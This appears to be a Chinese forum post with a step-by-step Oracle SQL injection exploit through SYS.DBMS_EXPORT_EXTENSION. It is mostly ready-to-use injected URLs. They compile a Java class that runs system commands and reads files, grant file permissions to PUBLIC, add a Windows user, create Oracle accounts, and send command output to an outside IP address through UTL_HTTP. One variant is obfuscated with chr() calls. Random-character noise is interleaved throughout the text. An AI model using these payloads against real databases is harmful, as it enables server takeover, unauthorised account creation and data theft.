以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
* u3 q, I8 D8 v0 R4 Y- }9 O4 I4 _ n5 }7 C% P7 |! P9 j2 m
/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) % _) {- X+ k4 _8 i* ?- x
的形式即可。(用" 'a'|| "是为了让语句返回true值) ' N% P; @+ f, z- a ?) [- _
语句有点长,可能要用post提交。 8 M1 A- V& O' z# r
以下是各个步骤:
7 B. [* Q7 g6 s7 r, G1.创建包 . H2 Z0 g3 e4 N' m1 }# o
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:& ?' ^$ _. O; q! C: m
/xxx.jsp?id=1 and '1'<>'a'||( - n6 I, i& O' N& ]
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT( 1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''* {7 q$ C- c# z# |: L. D
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
( Z0 h& v$ @2 pnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}4 a- o% {8 u9 f+ U3 [
}'''';END;'';END;--','SYS',0,'1',0) from dual
# s$ P4 O% z6 @% }. W W)
, Y/ ?0 x/ ~; E( C0 F/ n------------------------
& C5 s0 i+ ] S0 l5 P如果url有长度限制,可以把readFile()函数块去掉,即: 9 R# r( A8 r' K# I1 N' w7 q5 Q
/xxx.jsp?id=1 and '1'<>'a'||( 6 |4 l7 D3 D9 y' J& w
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
5 f& X$ ~" q+ p/ c0 ]8 vcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(; Y# |. k4 O2 z5 P1 R9 P
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
/ Q1 R9 A6 ~5 E, U- T- y}'''';END;'';END;--','SYS',0,'1',0) from dual
# h; K, d/ j8 l) @- H7 |* b% N) # a ~% `) Q4 {! m! o
同时把后面步骤 提到的 对readFile()的处理语句去掉。 0 E% `8 Z K+ c# u8 L
------------------------------ 3 N5 v. L9 r: d( ]8 p s
2.赋Java权限 : ?3 Q- _7 f: P2 F9 [( q7 h) r
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
6 C# H" M' f: I2 g* d3.创建函数 ! o. @. J% j8 ~+ g; @* [
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
! q% [4 [! P6 Ccreate or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual2 m6 \" p5 X8 ^3 E( ^
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
' h1 m3 ]6 u4 ]# Mcreate or replace function LinxReadFile(filename in varchar2) return varchar2 as language java name ''''''''LinxUtil.readFile(java.lang.String) return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual; f. Z- U! H; u. {- ^ }9 d* ?
4.赋public执行函数的权限 8 z. f$ Z; c9 T1 `: c- l8 k
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
2 X i. m' W, w# b8 C: hselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
3 W+ @) H! d5 Z& I% a, m+ w5.测试上面的几步是否成功
! o6 S$ C7 E) _2 J" i9 Dand '1'<>'11'||(
; X, g0 K% d6 Rselect OBJECT_ID from all_objects where object_name ='LINXRUNCMD'
7 R0 n& {- r, _2 y)
5 m" F A( N* w2 ?! R/ pand '1'<>( 7 N2 ]* o! f1 w: @. R1 A
select OBJECT_ID from all_objects where object_name ='LINXREADFILE'
( T9 c3 B# C# D6 F: K6 h/ ?/ e)
+ w0 @% @% \& m2 Q6.执行命令:
3 |. _9 {1 _( t( n/xxx.jsp?id=1 and '1'<>(
" a" F- a# `# l! A @9 Aselect sys.LinxRunCMD('cmd /c net user linx /add') from dual
% C' }, _5 \- g2 P: I$ W+ r- r; {& X
)
: d+ o( G2 v4 r4 ~$ S9 _/xxx.jsp?id=1 and '1'<>( 8 Y- W! C$ F9 N/ s* c
select sys.LinxReadFile('c:/boot.ini') from dual
% c+ d, O3 {1 C/ {5 _* _$ o* ?" W1 E3 M& s o
)
( D# k6 v9 y/ P- b $ I9 y( A, j) z; x1 B$ @ Z
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 - x# g% F6 H; _+ b' v
如果要查看运行结果可以用 union : - a- F7 y: f# b3 t
/xxx.jsp?id=1 union select sys.LinxRunCMD('cmd /c net user linx /add') from dual
4 p- N* i& _3 V* i# V' M( O或者UTL_HTTP.request(: 7 a( R5 f3 t! b/ P! f
/xxx.jsp?id=1 and '1'<>( ! x7 ~( R" {7 J7 l
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual/ u7 [+ u' R* O3 T
)
2 h, j8 @: c, C2 J2 n/xxx.jsp?id=1 and '1'<>(
5 p& R' X) a. y* e6 ?4 pSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual3 C/ ~1 E, X6 ~) d$ {1 ?4 m
)
/ z% w5 J) A9 C- d注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
1 v5 S: [' L0 a% m--------------------
y+ c: R, T9 ]8 ?6 C6.内部变化 ' X. h3 L9 m" G: R3 O
通过以下命令可以查看all_objects表达改变: # s* N8 ~ h# @: y8 f* Z! x
select * from all_objects where object_name like '%LINX%' or object_name like '%Linx%'$ }. K8 U; P M! X9 L) l
7.删除我们创建的函数 6 ]" e: D4 w4 D* O; J; F2 k2 G
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''' J3 c: L: E; L' c& _
drop function LinxRunCMD '''';END;'';END;--','SYS',0,'1',0) from dual
" E7 Z5 n2 |3 n==================================================== : q: c5 n, H0 \7 v; H
全文结束。谨以此文赠与我的朋友。
! x/ C/ [5 M! X- ?linx " @5 M; b, P* q' e4 E0 Y+ D' j1 `9 H- F
124829445
% r$ M. g3 k8 y1 j2008.1.12
, S9 F# \. Z- T( m) n8 J( ^linyujian@bjfu.edu.cn 4 G5 d/ ^- n1 X& |* m6 V
======================================================================
Y$ F1 |1 n6 {4 f2 x' I测试漏洞的另一方法:
! \1 U- D" O& A/ x2 A创建oracle帐号:
- K& d8 ^. b; T0 [+ z' Fselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''+ q$ m# h+ U% S7 V# N3 M
CREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
5 Y, w* P1 }: t6 I& v即: 7 h# L, t( p: W0 d i
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),0 P8 n8 V* i [% I( Z$ E
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual * l# O: l2 O9 _! Y; [
确定漏洞存在: * Q( q+ c5 i; Z
1<>( % q$ z5 G y0 i9 k5 e( a* y: B2 {, ^
select user_id from all_users where username='LINXSQL'
: k, D' l2 B: R2 h. w) 0 e! Q2 U( r2 b8 k0 ~
给linxsql连接权限:
) Q1 W1 {% p2 qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''& Q4 l$ q0 t; B$ a
GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual 5 z* J: J0 @, J$ S
删除帐号:
3 b* {) ]0 b3 q, g( U( ]0 tselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
l# N4 p# Y6 |drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
/ R6 V+ E/ c H======================
8 u8 [" h' B4 t. I, G以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
) f& b9 w0 G; T* K1 D1.jsp?id=1 and '1'<>(
( o- h- g8 E" ]) U8 _, Oselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''1 w1 o5 [ Y5 W
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1; end; '''';END;'';END;--','SYS',0,'1',0) from dual
- b6 |5 {$ ^0 K3 X1 t) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
0 i; V& d+ x3 F- @6 j6 Q, k )
, @ z7 u4 _6 Y8 I8 E2 `1 Y0 a* k# ?4 u
. Z8 Q- o' b8 q2 {
4 W+ w' H# D l, M/ x: M |
发表于 2012-12-18 12:21:48
收藏
支持
反对